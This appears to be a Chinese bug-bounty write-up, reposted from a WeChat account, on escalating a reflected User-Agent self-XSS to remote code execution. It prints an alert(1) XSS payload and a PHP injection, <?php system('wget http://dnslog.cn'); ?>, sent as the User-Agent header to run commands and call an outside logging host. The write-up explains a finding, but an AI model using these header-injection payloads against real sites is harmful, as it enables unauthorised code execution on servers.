如何从self-xss到RCE

admin 2023年7月5日19:11:50评论65 views字数 540阅读1分48秒阅读模式

作为一名白帽子,我认为最重要的是我们要在最大限度内尝试利用漏洞,最终导致该漏洞产生更大的影响。发现漏洞时不要急于提交。

这次漏洞也很简单....不是水问题在于你在看到的时候能否往这方面想。

0x00、信息搜集

跟上一篇一样,常规信息搜集,不过多叙述,重点放在危害提升。

0x01、XSS漏洞挖掘

浏览历史数据包发现网站会不定时发送一个数据包返回我的ip地址、浏览器、代理等。

如何从self-xss到RCE

首先想到的肯定是self-xss

于是我添加<script>alert(1)</script>作为User-Agent标头值以查看它是否会在返回包中出现

如何从self-xss到RCE

好消息是它成功了,坏消息是危害太小。

如何从self-xss到RCE


0x02、如何提升至RCE

我决定继续测试,在测试时我注意到他们网站上的其中一个页面的扩展名为.php,并且它也像所有其他页面一样以源代码返回我的信息。

所以我尝试了一下代码作为User-Agent标头值:

如何从self-xss到RCE

<?php system('wget http://dnslog.cn' ); ?>

今天还是lucky dog哈哈

如何从self-xss到RCE

接下来更新的有基础也会有漏洞挖掘或是代码审计,如有问题欢迎后台私信需要CNVD证书的大佬也可以私信

喜欢的可以关注收藏、转发与身边的朋友分享,感谢。

原文始发于微信公众号(漏洞之星):如何从self-xss到RCE

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年7月5日19:11:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   如何从self-xss到RCEhttp://cn-sec.com/archives/1850014.html

发表评论

匿名网友 填写信息